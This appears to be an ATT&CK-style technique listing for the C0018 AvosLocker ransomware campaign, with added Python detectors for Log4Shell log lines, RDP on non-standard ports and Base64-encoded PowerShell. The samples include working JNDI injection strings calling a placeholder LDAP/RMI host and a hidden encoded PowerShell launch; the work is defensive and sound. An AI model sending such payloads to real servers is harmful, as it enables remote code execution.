|Application Layer Protocol
|During C0018, the threat actors used HTTP for C2 communications.
|Command and Scripting Interpreter
|During C0018, the threat actors used encoded PowerShell scripts for execution.
|Data Encrypted for Impact
|During C0018, the threat actors used AvosLocker ransomware to encrypt files on the compromised network.
|Exploit Public-Facing Application
|During C0018, the threat actors exploited VMware Horizon Unified Access Gateways that were vulnerable to Log4Shell (CVE-2021-44228) and the related Log4j vulnerabilities CVE-2021-45046, CVE-2021-45105, and CVE-2021-44832.
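A defender reviewing Horizon UAG or reverse-proxy access logs for Log4Shell attempts looks for JNDI lookup strings, which attackers routinely hide behind nested Log4j lookups and URL encoding. The following Python is an added example, not code from this page or from the reporting it summarizes: it normalizes the common obfuscations (`${lower:}`, `${upper:}`, and undefined lookups with a `:-` default) and then extracts the JNDI scheme and target. The log lines, the `scan_log`/`normalize` names, and the 10.0.0.0/8 and 198.51.100.0/24 addresses are all constructed for the example.

```python
import re
from typing import Dict, List, Optional
from urllib.parse import unquote

# Constructed Apache-style access-log lines (not from the campaign). Lines 2-5
# carry a JNDI lookup in the User-Agent or the query string; three are obfuscated.
SAMPLE_LOG = [
    '10.0.0.5 - - [10/Feb/2022:10:00:01 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '10.0.0.9 - - [10/Feb/2022:10:00:02 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${jndi:ldap://198.51.100.7:1389/a}"',
    '10.0.0.9 - - [10/Feb/2022:10:00:03 +0000] "GET /portal/?x=${${lower:j}ndi:${lower:l}dap://198.51.100.7:1389/b} HTTP/1.1" 404 0 "-" "curl/7.68.0"',
    '10.0.0.9 - - [10/Feb/2022:10:00:04 +0000] "GET /portal/ HTTP/1.1" 200 512 "-" "${${env:NaN:-j}ndi:${::-r}mi://198.51.100.7:1099/c}"',
    '10.0.0.9 - - [10/Feb/2022:10:00:05 +0000] "GET /portal/?q=%24%7Bjndi%3Adns%3A%2F%2F198.51.100.7%2Fd%7D HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
]

INNER = re.compile(r"\$\{([^${}]*)\}")  # innermost ${...} lookup: no further ${ inside it
JNDI = re.compile(r"\$\{\s*jndi\s*:\s*([a-z]+)\s*:\s*([^}]*)\}", re.I)


def _resolve(body: str) -> Optional[str]:
    """Evaluate the Log4j lookups attackers use to hide the literal 'jndi' keyword."""
    low = body.lower()
    if low.startswith("lower:"):
        return body[6:].lower()
    if low.startswith("upper:"):
        return body[6:].upper()
    if ":-" in body:  # ${env:NaN:-j} or ${::-j}: lookup is undefined, so the default wins
        return body.split(":-", 1)[1]
    return None  # anything else, including the final jndi lookup itself, is left in place


def normalize(text: str, max_rounds: int = 20) -> str:
    """URL-decode once, then evaluate nested lookups from the inside out (bounded)."""
    text = unquote(text)
    for _ in range(max_rounds):
        changed = False

        def repl(m):
            nonlocal changed
            value = _resolve(m.group(1))
            if value is None:
                return m.group(0)
            changed = True
            return value

        text = INNER.sub(repl, text)
        if not changed:
            break
    return text


def scan_log(lines: List[str]) -> List[Dict[str, str]]:
    """Return one hit per log line that still contains a JNDI lookup after normalization."""
    hits = []
    for line in lines:
        m = JNDI.search(normalize(line))
        if m:
            hits.append({"client": line.split(" ", 1)[0],
                         "scheme": m.group(1).lower(),
                         "target": m.group(2)})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The normalization is bounded (`max_rounds`) so a hostile line cannot make the scanner loop, and URL decoding is applied only once, which matches how a servlet container would hand the value to Log4j. Anything the scanner flags should be correlated with outbound LDAP/RMI/DNS traffic from the gateway to the listed target.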
|Ingress Tool Transfer
|During C0018, the threat actors downloaded additional tools, including Mimikatz, Sliver, Cobalt Strike, and AvosLocker ransomware, onto the victim network.
|Lateral Tool Transfer
|During C0018, the threat actors transferred the SoftPerfect Network Scanner and other tools to machines in the network using AnyDesk and PDQ Deploy.
|During C0018, AvosLocker was disguised using the victim company name as the filename.
|Match Legitimate Name or Location
|For C0018, the threat actors renamed a Sliver payload to
|Network Service Discovery
|During C0018, the threat actors used the SoftPerfect Network Scanner for network scanning.
|During C0018, the threat actors opened a variety of ports, including ports 28035, 32467, 41578, and 46892, to establish RDP connections.
|Obfuscated Files or Information
|During C0018, the threat actors used Base64 to encode their PowerShell scripts.
|For C0018, the threat actors acquired a variety of open source tools, including Mimikatz, Sliver, SoftPerfect Network Scanner, AnyDesk, and PDQ Deploy.
|Remote Access Software
|During C0018, the threat actors used AnyDesk to transfer tools between systems.
|Remote Desktop Protocol
|During C0018, the threat actors opened a variety of ports to establish RDP connections, including ports 28035, 32467, 41578, and 46892.
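Because the actors ran RDP on ports such as 28035, 32467, 41578, and 46892, a port-based rule misses it; the reliable approach is to fingerprint the protocol from the first client packet, which in RDP is a clear-text X.224 Connection Request sent before any TLS or CredSSP negotiation. The Python below is an added example, not code from this page or its sources: it parses that packet, pulls out the `mstshash` cookie (the client's username hint) and the requested security protocols, and flags RDP seen on anything other than 3389. The flow records and `build_cr` fixture are constructed for the example; `parse_rdp_connection_request` and `find_nonstandard_rdp` are names chosen here.

```python
from typing import Dict, List, Optional

RDP_STANDARD_PORT = 3389


def parse_rdp_connection_request(payload: bytes) -> Optional[Dict]:
    """Parse the first client packet of an RDP session, or return None if it is not one.

    Layout (MS-RDPBCGR 2.2.1.1): TPKT header 03 00 <len16 BE>, then an X.224
    Connection Request TPDU (LI, type 0xE0, dst-ref, src-ref, class), then an
    optional cookie "Cookie: mstshash=<user>\\r\\n" and an optional RDP
    Negotiation Request (type 0x01, flags, len16 LE == 8, protocols32 LE).
    """
    if len(payload) < 11 or payload[0] != 0x03 or payload[1] != 0x00:
        return None
    tpkt_len = int.from_bytes(payload[2:4], "big")
    li, tpdu_type = payload[4], payload[5]
    if tpkt_len > len(payload) or li + 5 != tpkt_len or tpdu_type != 0xE0:
        return None
    rest = payload[11:tpkt_len]  # bytes after the 7-byte fixed X.224 CR header
    cookie = None
    if rest.startswith(b"Cookie: mstshash="):
        end = rest.find(b"\r\n")
        if end == -1:
            return None
        cookie = rest[17:end].decode("ascii", "replace")
        rest = rest[end + 2:]
    protocols = None
    if len(rest) >= 8 and rest[0] == 0x01 and int.from_bytes(rest[2:4], "little") == 8:
        protocols = int.from_bytes(rest[4:8], "little")  # 0=RDP, 1=TLS, 2=CredSSP (bit flags)
    return {"cookie": cookie, "requested_protocols": protocols}


def build_cr(cookie: Optional[str], protocols: int = 0x3) -> bytes:
    """Construct a valid X.224 Connection Request for the sample flows (test fixture)."""
    body = b""
    if cookie:
        body += b"Cookie: mstshash=" + cookie.encode() + b"\r\n"
    body += bytes([0x01, 0x00]) + (8).to_bytes(2, "little") + protocols.to_bytes(4, "little")
    x224 = bytes([0xE0, 0, 0, 0, 0, 0]) + body  # type, dst-ref, src-ref, class, payload
    li = len(x224)
    return bytes([0x03, 0x00]) + (li + 5).to_bytes(2, "big") + bytes([li]) + x224


# Constructed flow records: first client payload per TCP connection (10.0.0.0/8 placeholders).
SAMPLE_FLOWS = [
    {"src": "10.0.0.5", "dst": "10.0.0.20", "dport": 3389, "payload": build_cr("admin")},
    {"src": "10.0.0.5", "dst": "10.0.0.21", "dport": 28035, "payload": build_cr("admin")},
    {"src": "10.0.0.5", "dst": "10.0.0.22", "dport": 32467,
     "payload": bytes.fromhex("160301007a0100007603035f")},  # TLS ClientHello fragment, not RDP
    {"src": "10.0.0.5", "dst": "10.0.0.23", "dport": 41578, "payload": build_cr(None)},
    {"src": "10.0.0.5", "dst": "10.0.0.24", "dport": 46892, "payload": build_cr("svc_backup", 0x0)},
]


def find_nonstandard_rdp(flows: List[Dict]) -> List[Dict]:
    """Return RDP connections whose destination port is not 3389."""
    hits = []
    for f in flows:
        parsed = parse_rdp_connection_request(f["payload"])
        if parsed is None or f["dport"] == RDP_STANDARD_PORT:
            continue
        hits.append({**{k: f[k] for k in ("src", "dst", "dport")}, **parsed})
    return hits


if __name__ == "__main__":
    for hit in find_nonstandard_rdp(SAMPLE_FLOWS):
        print(hit)
```

The length checks matter: a truncated capture or a non-RDP service that happens to start with `03 00` is rejected rather than reported. A requested protocol value of 0 (plain RDP security, no TLS) on a non-standard port is a stronger signal still, since modern clients default to requesting TLS or CredSSP.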
|Software Deployment Tools
|During C0018, the threat actors used PDQ Deploy to move AvosLocker and tools across the network.
|System Binary Proxy Execution
|During C0018, the threat actors used rundll32 to run Mimikatz.
|System Network Configuration Discovery
|During C0018, the threat actors ran nslookup and Advanced IP Scanner on the target network.
|System Owner/User Discovery
|During C0018, the threat actors collected whoami information via PowerShell scripts.
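Several rows on this page describe the same artifact from different angles: Base64-encoded PowerShell (Command and Scripting Interpreter, Obfuscated Files or Information), whoami collection inside those scripts, and scripts launched under WMI Provider Host. A single triage routine over process-creation events covers all of them. The Python below is an added example, not code from this page or its sources: it finds the `-EncodedCommand` argument in any of PowerShell's accepted short forms, decodes the UTF-16LE Base64 payload, and then scores the event on the parent process and on discovery commands in the decoded text. The events are constructed with Sysmon Event ID 1 field names (Image, ParentImage, CommandLine); `triage` and `decode_encoded_command` are names chosen here.

```python
import base64
import re
from typing import Dict, List, Optional

# PowerShell accepts any unambiguous prefix of -EncodedCommand; these are the common ones.
ENC_FLAG = re.compile(r"(?:^|\s)[-/](?:e|ec|en|enc|encodedcommand)\s+[\"']?([A-Za-z0-9+/=]{8,})", re.I)
DISCOVERY = ("whoami", "nslookup", "net user", "net group", "systeminfo", "ipconfig")


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the decoded script if the command line carries -EncodedCommand, else None."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        raw = base64.b64decode(m.group(1), validate=True)
    except ValueError:  # binascii.Error is a ValueError: not real Base64, so not an encoded command
        return None
    return raw.decode("utf-16le", errors="replace")  # PowerShell encodes the script as UTF-16LE


def encode_ps(script: str) -> str:
    """Build an -EncodedCommand value the way PowerShell expects it (used only for the samples)."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


# Constructed process-creation events with Sysmon EID 1 field names (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\wbem\WmiPrvSE.exe",
     "CommandLine": "powershell.exe -NoP -NonI -W Hidden -Enc " + encode_ps("whoami /all; Get-Process")},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "powershell -ec " + encode_ps("Get-Date")},
]


def triage(events: List[Dict[str, str]]) -> List[Dict]:
    """Decode every encoded PowerShell launch and attach the reasons it looks suspicious."""
    findings = []
    for i, ev in enumerate(events):
        decoded = decode_encoded_command(ev["CommandLine"])
        if decoded is None:
            continue
        reasons = []
        parent = ev["ParentImage"].rsplit("\\", 1)[-1].lower()
        if parent == "wmiprvse.exe":  # PowerShell spawned by WMI Provider Host: remote WMI execution
            reasons.append("parent:wmiprvse.exe")
        for kw in DISCOVERY:
            if kw in decoded.lower():
                reasons.append("discovery:" + kw)
        findings.append({"index": i, "parent": parent, "decoded": decoded, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

Decoding before matching is the point: a rule that looks for `whoami` in the raw command line never sees it, while a rule that alerts on every `-enc` drowns in legitimate management scripts. Keying on the parent (`wmiprvse.exe`, and by the same logic `services.exe` for PsExec-style launches) separates remote execution from local administration.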
|Windows Management Instrumentation
|During C0018, the threat actors used WMIC to modify administrative settings on both a local and a remote host, likely as part of the first stages for their lateral movement; they also used WMI Provider Host (wmiprvse.exe) to execute a variety of encoded PowerShell scripts using the